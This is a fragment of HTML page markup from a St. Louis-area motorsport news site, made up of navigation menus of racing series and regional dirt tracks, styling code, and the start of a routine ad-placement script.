		<li id="menu-item-23245" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent tdb-menu-item tdb-normal-menu menu-item-23245"><a href="https://www.stlracing.com/category/dirt-late-model-news/world-of-outlaws-late-model-series-news/"><div class="tdb-menu-item-text">World of Outlaws Late Model Series News</div></a></li>
	</ul>
</li>
	<li id="menu-item-23247" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children tdb-menu-item tdb-normal-menu menu-item-23247 tdb-menu-item-inactive"><a href="https://www.stlracing.com/category/sprint-car-news/"><div class="tdb-menu-item-text">Sprint/Midget News</div><i class="tdb-sub-menu-icon td-icon-pluss"></i></a>
	<ul class="sub-menu">
		<li id="menu-item-23258" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23258"><a href="https://www.stlracing.com/category/sprint-car-news/all-star-sprint-series-news/"><div class="tdb-menu-item-text">All Star Sprint Series News</div></a></li>
		<li id="menu-item-23259" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23259"><a href="https://www.stlracing.com/category/sprint-car-news/american-sprint-car-series-ascs-news/"><div class="tdb-menu-item-text">American Sprint Car Series (ASCS) News</div></a></li>
		<li id="menu-item-23260" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23260"><a href="https://www.stlracing.com/category/sprint-car-news/comp-cams-interstate-sprint-car-cup/"><div class="tdb-menu-item-text">COMP Cams Interstate Sprint Car Cup</div></a></li>
		<li id="menu-item-23272" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23272"><a href="https://www.stlracing.com/category/sprint-car-news/generalother-sprint-midget-news/"><div class="tdb-menu-item-text">General/Other Sprint-Midget News</div></a></li>
		<li id="menu-item-23320" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23320"><a href="https://www.stlracing.com/category/sprint-car-news/mid-america-lightning-sprints/"><div class="tdb-menu-item-text">Mid-America Lightning Sprints</div></a></li>
		<li id="menu-item-23321" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23321"><a href="https://www.stlracing.com/category/sprint-car-news/monster-energy-sprint-series/"><div class="tdb-menu-item-text">MOWA Sprint Series</div></a></li>
		<li id="menu-item-23322" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23322"><a href="https://www.stlracing.com/category/sprint-car-news/powri-series-news/"><div class="tdb-menu-item-text">POWRi Series News</div></a></li>
		<li id="menu-item-23325" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23325"><a href="https://www.stlracing.com/category/sprint-car-news/usac-news/"><div class="tdb-menu-item-text">USAC News</div></a></li>
		<li id="menu-item-23326" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23326"><a href="https://www.stlracing.com/category/sprint-car-news/uscs-sprint-car-news/"><div class="tdb-menu-item-text">USCS</div></a></li>
		<li id="menu-item-23327" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent tdb-menu-item tdb-normal-menu menu-item-23327"><a href="https://www.stlracing.com/category/sprint-car-news/world-of-outlaws-sprint-car-series-news/"><div class="tdb-menu-item-text">World of Outlaws Sprint Car Series News</div></a></li>
	</ul>
</li>
	<li id="menu-item-23248" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children tdb-menu-item tdb-normal-menu menu-item-23248 tdb-menu-item-inactive"><a href="https://www.stlracing.com/category/open-wheel-modified-news/"><div class="tdb-menu-item-text">Modified News</div><i class="tdb-sub-menu-icon td-icon-pluss"></i></a>
	<ul class="sub-menu">
		<li id="menu-item-23273" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23273"><a href="https://www.stlracing.com/category/open-wheel-modified-news/american-modified-series/"><div class="tdb-menu-item-text">American Modified Series</div></a></li>
		<li id="menu-item-23274" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23274"><a href="https://www.stlracing.com/category/open-wheel-modified-news/amra-series-news/"><div class="tdb-menu-item-text">AMRA Series News</div></a></li>
		<li id="menu-item-23275" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23275"><a href="https://www.stlracing.com/category/open-wheel-modified-news/big-block-modifieds/"><div class="tdb-menu-item-text">Big Block Modifieds</div></a></li>
		<li id="menu-item-23307" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23307"><a href="https://www.stlracing.com/category/open-wheel-modified-news/imca-news/"><div class="tdb-menu-item-text">IMCA Modified &amp; Sport Mod News</div></a></li>
		<li id="menu-item-23253" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent tdb-menu-item tdb-normal-menu menu-item-23253"><a href="https://www.stlracing.com/category/open-wheel-modified-news/u-m-p-dirtcar-series-news-open-wheel-modified-news/"><div class="tdb-menu-item-text">U.M.P. DIRTcar Series Modified News</div></a></li>
		<li id="menu-item-23344" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23344"><a href="https://www.stlracing.com/category/open-wheel-modified-news/usmts-news/"><div class="tdb-menu-item-text">USMTS News</div></a></li>
		<li id="menu-item-23345" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23345"><a href="https://www.stlracing.com/category/open-wheel-modified-news/usra-open-wheel-modified-news/"><div class="tdb-menu-item-text">USRA</div></a></li>
	</ul>
</li>
	<li id="menu-item-23267" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children tdb-menu-item tdb-normal-menu menu-item-23267 tdb-menu-item-inactive"><a href="https://www.stlracing.com/category/race-track-news/"><div class="tdb-menu-item-text">Race Track News</div><i class="tdb-sub-menu-icon td-icon-pluss"></i></a>
	<ul class="sub-menu">
		<li id="menu-item-23264" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children tdb-menu-item tdb-normal-menu menu-item-23264 tdb-menu-item-inactive"><a href="https://www.stlracing.com/category/race-track-news/illinois/"><div class="tdb-menu-item-text">Illinois</div><i class="tdb-sub-menu-icon td-icon-pluss"></i></a>
		<ul class="sub-menu">
			<li id="menu-item-23276" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23276"><a href="https://www.stlracing.com/category/race-track-news/illinois/belle-clair-speedway/"><div class="tdb-menu-item-text">Belle-Clair Speedway</div></a></li>
			<li id="menu-item-23277" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23277"><a href="https://www.stlracing.com/category/race-track-news/illinois/bond-county-raceway/"><div class="tdb-menu-item-text">Bond County Raceway</div></a></li>
			<li id="menu-item-23278" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23278"><a href="https://www.stlracing.com/category/race-track-news/illinois/charleston-speedway/"><div class="tdb-menu-item-text">Charleston Speedway</div></a></li>
			<li id="menu-item-23280" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23280"><a href="https://www.stlracing.com/category/race-track-news/illinois/coles-county-speedway/"><div class="tdb-menu-item-text">Coles County Speedway</div></a></li>
			<li id="menu-item-23281" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23281"><a href="https://www.stlracing.com/category/race-track-news/illinois/duquoin-state-fairgrounds/"><div class="tdb-menu-item-text">DuQuoin State Fairgrounds</div></a></li>
			<li id="menu-item-23282" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23282"><a href="https://www.stlracing.com/category/race-track-news/illinois/fairbury-american-legion-speedway/"><div class="tdb-menu-item-text">Fairbury American Legion Speedway</div></a></li>
			<li id="menu-item-23283" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23283"><a href="https://www.stlracing.com/category/race-track-news/illinois/farmer-city-raceway/"><div class="tdb-menu-item-text">Farmer City Raceway</div></a></li>
			<li id="menu-item-23284" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23284"><a href="https://www.stlracing.com/category/race-track-news/illinois/fayette-county-speedway/"><div class="tdb-menu-item-text">Fayette County Speedway</div></a></li>
			<li id="menu-item-23285" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23285"><a href="https://www.stlracing.com/category/race-track-news/illinois/wwt-raceway/"><div class="tdb-menu-item-text">Gateway Int&#8217;l Raceway</div></a></li>
			<li id="menu-item-23287" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23287"><a href="https://www.stlracing.com/category/race-track-news/illinois/highland-speedway/"><div class="tdb-menu-item-text">Highland Speedway</div></a></li>
			<li id="menu-item-23298" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23298"><a href="https://www.stlracing.com/category/race-track-news/illinois/jacksonville-speedway/"><div class="tdb-menu-item-text">Jacksonville Speedway</div></a></li>
			<li id="menu-item-23299" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23299"><a href="https://www.stlracing.com/category/race-track-news/illinois/kankakee-county-speedway/"><div class="tdb-menu-item-text">Kankakee County Speedway</div></a></li>
			<li id="menu-item-23300" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23300"><a href="https://www.stlracing.com/category/race-track-news/illinois/la-salle-speedway/"><div class="tdb-menu-item-text">La Salle Speedway</div></a></li>
			<li id="menu-item-23301" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23301"><a href="https://www.stlracing.com/category/race-track-news/illinois/lincoln-speedway/"><div class="tdb-menu-item-text">Lincoln Speedway</div></a></li>
			<li id="menu-item-23302" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23302"><a href="https://www.stlracing.com/category/race-track-news/illinois/macon-speedway/"><div class="tdb-menu-item-text">Macon Speedway</div></a></li>
			<li id="menu-item-23303" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23303"><a href="https://www.stlracing.com/category/race-track-news/illinois/mt-vernon-raceway/"><div class="tdb-menu-item-text">Mt. Vernon Raceway</div></a></li>
			<li id="menu-item-23304" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23304"><a href="https://www.stlracing.com/category/race-track-news/illinois/peoria-speedway/"><div class="tdb-menu-item-text">Peoria Speedway</div></a></li>
			<li id="menu-item-23305" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23305"><a href="https://www.stlracing.com/category/race-track-news/illinois/quad-city-raceway/"><div class="tdb-menu-item-text">Quad City Raceway</div></a></li>
			<li id="menu-item-23306" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23306"><a href="https://www.stlracing.com/category/race-track-news/illinois/quincy-raceway/"><div class="tdb-menu-item-text">Adams County Speedway (Quincy Raceway)</div></a></li>
			<li id="menu-item-23279" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23279"><a href="https://www.stlracing.com/category/race-track-news/illinois/clay-county-speedway/"><div class="tdb-menu-item-text">Route 45 Raceway</div></a></li>
			<li id="menu-item-23340" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23340"><a href="https://www.stlracing.com/category/race-track-news/illinois/spoon-river-speedway/"><div class="tdb-menu-item-text">Spoon River Speedway</div></a></li>
			<li id="menu-item-23341" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23341"><a href="https://www.stlracing.com/category/race-track-news/illinois/springfield-mile/"><div class="tdb-menu-item-text">Springfield Mile</div></a></li>
			<li id="menu-item-23266" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23266"><a href="https://www.stlracing.com/category/race-track-news/illinois/tri-city-speedway/"><div class="tdb-menu-item-text">Tri-City Speedway</div></a></li>
			<li id="menu-item-23342" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23342"><a href="https://www.stlracing.com/category/race-track-news/illinois/vermilion-county-speedway/"><div class="tdb-menu-item-text">Vermilion County Speedway</div></a></li>
			<li id="menu-item-23343" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23343"><a href="https://www.stlracing.com/category/race-track-news/illinois/wayne-county-speedway-illinois/"><div class="tdb-menu-item-text">Wayne County Speedway</div></a></li>
		</ul>
</li>
		<li id="menu-item-28112" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28112"><a href="https://www.stlracing.com/category/race-track-news/indiana/"><div class="tdb-menu-item-text">Indiana</div></a></li>
		<li id="menu-item-72496" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-72496"><a href="https://www.stlracing.com/category/race-track-news/iowa/"><div class="tdb-menu-item-text">Iowa</div></a></li>
		<li id="menu-item-28113" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28113"><a href="https://www.stlracing.com/category/race-track-news/kentucky/"><div class="tdb-menu-item-text">Kentucky</div></a></li>
		<li id="menu-item-23265" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children tdb-menu-item tdb-normal-menu menu-item-23265 tdb-menu-item-inactive"><a href="https://www.stlracing.com/category/race-track-news/missouri/"><div class="tdb-menu-item-text">Missouri</div><i class="tdb-sub-menu-icon td-icon-pluss"></i></a>
		<ul class="sub-menu">
			<li id="menu-item-23288" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23288"><a href="https://www.stlracing.com/category/race-track-news/missouri/benton-racepark/"><div class="tdb-menu-item-text">Benton Racepark</div></a></li>
			<li id="menu-item-23289" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23289"><a href="https://www.stlracing.com/category/race-track-news/missouri/big-river-sand-drags/"><div class="tdb-menu-item-text">Big River Sand Drags</div></a></li>
			<li id="menu-item-23290" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23290"><a href="https://www.stlracing.com/category/race-track-news/missouri/butler-motor-speedway/"><div class="tdb-menu-item-text">Butler Motor Speedway</div></a></li>
			<li id="menu-item-23291" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23291"><a href="https://www.stlracing.com/category/race-track-news/missouri/callaway-raceway/"><div class="tdb-menu-item-text">Callaway Raceway</div></a></li>
			<li id="menu-item-23292" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23292"><a href="https://www.stlracing.com/category/race-track-news/missouri/central-missouri-speedway/"><div class="tdb-menu-item-text">Central Missouri Speedway</div></a></li>
			<li id="menu-item-23293" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23293"><a href="https://www.stlracing.com/category/race-track-news/missouri/doe-run-raceway/"><div class="tdb-menu-item-text">Doe Run Raceway</div></a></li>
			<li id="menu-item-23294" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23294"><a href="https://www.stlracing.com/category/race-track-news/missouri/double-x-speedway/"><div class="tdb-menu-item-text">Double X Speedway</div></a></li>
			<li id="menu-item-23295" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23295"><a href="https://www.stlracing.com/category/race-track-news/missouri/fredericktown-raceway/"><div class="tdb-menu-item-text">Fredericktown Raceway</div></a></li>
			<li id="menu-item-23297" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23297"><a href="https://www.stlracing.com/category/race-track-news/missouri/i-55-raceway/"><div class="tdb-menu-item-text">Federated Auto Parts Raceway at I-55</div></a></li>
			<li id="menu-item-23296" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23296"><a href="https://www.stlracing.com/category/race-track-news/missouri/i-35-speedway/"><div class="tdb-menu-item-text">I-35 Speedway</div></a></li>
			<li id="menu-item-23309" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23309"><a href="https://www.stlracing.com/category/race-track-news/missouri/la-raceway/"><div class="tdb-menu-item-text">LA Raceway</div></a></li>
			<li id="menu-item-23310" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23310"><a href="https://www.stlracing.com/category/race-track-news/missouri/lake-ozark-speedway/"><div class="tdb-menu-item-text">Lake Ozark Speedway</div></a></li>
			<li id="menu-item-23311" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23311"><a href="https://www.stlracing.com/category/race-track-news/missouri/lebanon-i-44-speedway/"><div class="tdb-menu-item-text">Lebanon I-44 Speedway</div></a></li>
			<li id="menu-item-23312" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23312"><a href="https://www.stlracing.com/category/race-track-news/missouri/lebanon-midway-speedway/"><div class="tdb-menu-item-text">Lebanon Midway Speedway</div></a></li>
			<li id="menu-item-28146" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28146"><a href="https://www.stlracing.com/category/race-track-news/missouri/legit-speedway-park/"><div class="tdb-menu-item-text">Legit Speedway Park</div></a></li>
			<li id="menu-item-23313" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23313"><a href="https://www.stlracing.com/category/race-track-news/missouri/lucas-oil-speedway/"><div class="tdb-menu-item-text">Lucas Oil Speedway</div></a></li>
			<li id="menu-item-28136" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28136"><a href="https://www.stlracing.com/category/race-track-news/missouri/missouri-state-fair-speedway/"><div class="tdb-menu-item-text">Missouri State Fair Speedway</div></a></li>
			<li id="menu-item-28137" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28137"><a href="https://www.stlracing.com/category/race-track-news/missouri/monett-speedway/"><div class="tdb-menu-item-text">Monett Speedway</div></a></li>
			<li id="menu-item-28138" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28138"><a href="https://www.stlracing.com/category/race-track-news/missouri/montgomery-county-speedway/"><div class="tdb-menu-item-text">Montgomery Motorsports Park</div></a></li>
			<li id="menu-item-28139" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28139"><a href="https://www.stlracing.com/category/race-track-news/missouri/nevada-speedway/"><div class="tdb-menu-item-text">Nevada Speedway</div></a></li>
			<li id="menu-item-28140" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28140"><a href="https://www.stlracing.com/category/race-track-news/missouri/poplar-bluff-speedway/"><div class="tdb-menu-item-text">Poplar Bluff Speedway</div></a></li>
			<li id="menu-item-23328" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-23328"><a href="https://www.stlracing.com/category/race-track-news/missouri/24-raceway/"><div class="tdb-menu-item-text">Randolph County Raceway</div></a></li>
			<li id="menu-item-28141" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28141"><a href="https://www.stlracing.com/category/race-track-news/missouri/scotland-county-speedway/"><div class="tdb-menu-item-text">Scotland County Speedway</div></a></li>
			<li id="menu-item-28142" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28142"><a href="https://www.stlracing.com/category/race-track-news/missouri/springfield-raceway/"><div class="tdb-menu-item-text">Springfield Raceway</div></a></li>
			<li id="menu-item-28143" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28143"><a href="https://www.stlracing.com/category/race-track-news/missouri/st-francois-county-raceway/"><div class="tdb-menu-item-text">St. Francois County Raceway</div></a></li>
			<li id="menu-item-28144" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28144"><a href="https://www.stlracing.com/category/race-track-news/missouri/us-36-raceway/"><div class="tdb-menu-item-text">US 36 Raceway</div></a></li>
			<li id="menu-item-28145" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28145"><a href="https://www.stlracing.com/category/race-track-news/missouri/valley-speedway-mo-m-z/"><div class="tdb-menu-item-text">Valley Speedway</div></a></li>
			<li id="menu-item-28147" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28147"><a href="https://www.stlracing.com/category/race-track-news/missouri/winston-speedway-missouri/"><div class="tdb-menu-item-text">Winston Speedway</div></a></li>
		</ul>
</li>
		<li id="menu-item-28169" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-28169"><a href="https://www.stlracing.com/category/race-track-news/ohio/"><div class="tdb-menu-item-text">Ohio</div></a></li>
		<li id="menu-item-72498" class="menu-item menu-item-type-taxonomy menu-item-object-category tdb-menu-item tdb-normal-menu menu-item-72498"><a href="https://www.stlracing.com/category/race-track-news/tennessee/"><div class="tdb-menu-item-text">Tennessee</div></a></li>
	</ul>
</li>
</ul>
</li>
<li id="menu-item-54487" class="menu-item menu-item-type-custom menu-item-object-custom tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-54487"><a href="https://www.stlracingphotos.com"><div class="tdb-menu-item-text">Photos</div></a></li>
<li id="menu-item-31489" class="menu-item menu-item-type-post_type menu-item-object-page tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-31489"><a href="https://www.stlracing.com/contact/"><div class="tdb-menu-item-text">Contact Us</div></a></li>
<li id="menu-item-54486" class="menu-item menu-item-type-custom menu-item-object-custom tdb-menu-item-button tdb-menu-item tdb-normal-menu menu-item-54486"><a href="https://www.stlracing.com/advertise.html"><div class="tdb-menu-item-text">Advertise</div></a></li>
</ul><div class="tdb-menu-items-dropdown"><div class="td-subcat-more"><div class="tdb-menu-item-text">More</div><i class="tdb-menu-more-subicon td-icon-pluss tdb-main-sub-menu-icon"></i><ul class="td-pulldown-filter-list"></ul></div></div></div></div></div></div></div><div class="vc_column tdi_36  wpb_column vc_column_container tdc-column td-pb-span3">
<style scoped>

/* custom css */
.tdi_36{
                    vertical-align: baseline;
                }.tdi_36 > .wpb_wrapper,
				.tdi_36 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_36 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_36 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_36 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
/* inline tdc_css att */

.tdi_36{
width:20% !important;
}

</style><div class="wpb_wrapper"><div class="tdm_block td_block_wrap tdm_block_socials tdi_37 tdm-content-horiz-right td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_37" >
<style>
/* custom css */
.tdm_block.tdm_block_socials{
                  margin-bottom: 0;
                }.tdm-social-wrapper{
                  *zoom: 1;
                }.tdm-social-wrapper:before,
                .tdm-social-wrapper:after{
                  display: table;
                  content: '';
                  line-height: 0;
                }.tdm-social-wrapper:after{
                  clear: both;
                }.tdm-social-item-wrap{
                  display: inline-block;
                }.tdm-social-item{
                  position: relative;
                  display: inline-block;
                  vertical-align: middle;
                  -webkit-transition: all 0.2s;
                  transition: all 0.2s;
                  text-align: center;
                  -webkit-transform: translateZ(0);
                  transform: translateZ(0);
                }.tdm-social-item i{
                  font-size: 14px;
                  color: #4db2ec;
                  -webkit-transition: all 0.2s;
                  transition: all 0.2s;
                }.tdm-social-text{
                  display: none;
                  margin-top: -1px;
                  vertical-align: middle;
                  font-size: 13px;
                  color: #4db2ec;
                  -webkit-transition: all 0.2s;
                  transition: all 0.2s;
                }.tdm-social-item-wrap:hover i,
                .tdm-social-item-wrap:hover .tdm-social-text{
                  color: #000;
                }.tdm-social-item-wrap:last-child .tdm-social-text{
                  margin-right: 0 !important;
                }
</style>
<style>
.tdi_38 .tdm-social-item i{
					font-size: 13px;
					vertical-align: middle;
				
					line-height: 32.5px;
				}.tdi_38 .tdm-social-item i.td-icon-twitter,
				.tdi_38 .tdm-social-item i.td-icon-linkedin,
				.tdi_38 .tdm-social-item i.td-icon-pinterest,
				.tdi_38 .tdm-social-item i.td-icon-blogger,
				.tdi_38 .tdm-social-item i.td-icon-vimeo{
					font-size: 10.4px;
				}.tdi_38 .tdm-social-item{
					width: 32.5px;
					height: 32.5px;
				
				    margin: 5px 10px 5px 0;
				}.tdi_38 .tdm-social-item-wrap:last-child .tdm-social-item{
				    margin-right: 0 !important;
				}.tdi_38 .tdm-social-item i,
				.tds-team-member2 .tdi_38.tds-social1 .tdm-social-item i{
					color: rgba(255,252,252,0.6);
				}.tdi_38 .tdm-social-item-wrap:hover i,
				.tds-team-member2 .tdi_38.tds-social1 .tdm-social-item:hover i{
					color: #ffffff;
				}.tdi_38 .tdm-social-text{
					display: none;
				
					margin-left: 2px;
				
					margin-right: 18px;
				}

/* landscape */
@media (min-width: 1019px) and (max-width: 1140px){
.tdi_38 .tdm-social-item i{
					font-size: 12px;
					vertical-align: middle;
				
					line-height: 30px;
				}.tdi_38 .tdm-social-item i.td-icon-twitter,
				.tdi_38 .tdm-social-item i.td-icon-linkedin,
				.tdi_38 .tdm-social-item i.td-icon-pinterest,
				.tdi_38 .tdm-social-item i.td-icon-blogger,
				.tdi_38 .tdm-social-item i.td-icon-vimeo{
					font-size: 9.6px;
				}.tdi_38 .tdm-social-item{
					width: 30px;
					height: 30px;
				}
}

/* portrait */
@media (min-width: 768px) and (max-width: 1018px){
.tdi_38 .tdm-social-item i{
					font-size: 12px;
					vertical-align: middle;
				
					line-height: 30px;
				}.tdi_38 .tdm-social-item i.td-icon-twitter,
				.tdi_38 .tdm-social-item i.td-icon-linkedin,
				.tdi_38 .tdm-social-item i.td-icon-pinterest,
				.tdi_38 .tdm-social-item i.td-icon-blogger,
				.tdi_38 .tdm-social-item i.td-icon-vimeo{
					font-size: 9.6px;
				}.tdi_38 .tdm-social-item{
					width: 30px;
					height: 30px;
				
				    margin: 2.5px 5px 2.5px 0;
				}
}
</style><div class="tdm-social-wrapper tds-social1 tdi_38"><div class="tdm-social-item-wrap"><a href="#"  title="Facebook" class="tdm-social-item"><i class="td-icon-font td-icon-facebook"></i></a><a href="#" class="tdm-social-text" >Facebook</a></div><div class="tdm-social-item-wrap"><a href="#"  title="Instagram" class="tdm-social-item"><i class="td-icon-font td-icon-instagram"></i></a><a href="#" class="tdm-social-text" >Instagram</a></div><div class="tdm-social-item-wrap"><a href="#"  title="Twitter" class="tdm-social-item"><i class="td-icon-font td-icon-twitter"></i></a><a href="#" class="tdm-social-text" >Twitter</a></div></div></div></div></div></div></div><div id="tdi_39" class="tdc-row stretch_row_1200 td-stretch-content"><div class="vc_row tdi_40  wpb_row td-pb-row" >
<style scoped>

/* custom css */
.tdi_40,
                .tdi_40 .tdc-columns{
                    min-height: 0;
                }.tdi_40,
				.tdi_40 .tdc-columns{
				    display: block;
				}.tdi_40 .tdc-columns{
				    width: 100%;
				}
</style><div class="vc_column tdi_42  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped>

/* custom css */
.tdi_42{
                    vertical-align: baseline;
                }.tdi_42 > .wpb_wrapper,
				.tdi_42 > .wpb_wrapper > .tdc-elements{
				    display: block;
				}.tdi_42 > .wpb_wrapper > .tdc-elements{
				    width: 100%;
				}.tdi_42 > .wpb_wrapper > .vc_row_inner{
				    width: auto;
				}.tdi_42 > .wpb_wrapper{
				    width: auto;
				    height: auto;
				}
</style><div class="wpb_wrapper"><div class="wpb_wrapper td_block_separator td_block_wrap vc_separator tdi_44  td_separator_solid td_separator_center"><span style="border-color:rgba(255,252,252,0.12);border-width:1px;width:100%;"></span>
<style scoped>

/* inline tdc_css att */

.tdi_44{
margin-bottom:0px !important;
}

</style></div><div class="td-a-rec td-a-rec-id-custom_ad_1  tdi_45 td_block_template_1">
<style>
/* custom css */
.tdi_45.td-a-rec{
					text-align: center;
				}.tdi_45 .td-element-style{
					z-index: -1;
				}
</style><!-- STLRacing.com 728x90 [async] -->
<script type="text/javascript">if (!window.AdButler){(function(){var s = document.createElement("script"); s.async = true; s.type = "text/javascript";s.src = 'https://servedbyadbutler.com/app.js';var n = document.getElementsByTagName("script")[0]; n.parentNode.insertBefore(s, n);}());}</script>
<script type="text/javascript">
var AdButler = AdButler || {}; AdButler.ads = AdButler.ads || [];
var abkw = window.abkw || '';
var plc313963 = window.plc313963 || 0;
document.write('<'+'div id="placement_313963_'+plc313963+'"></'+'div>');
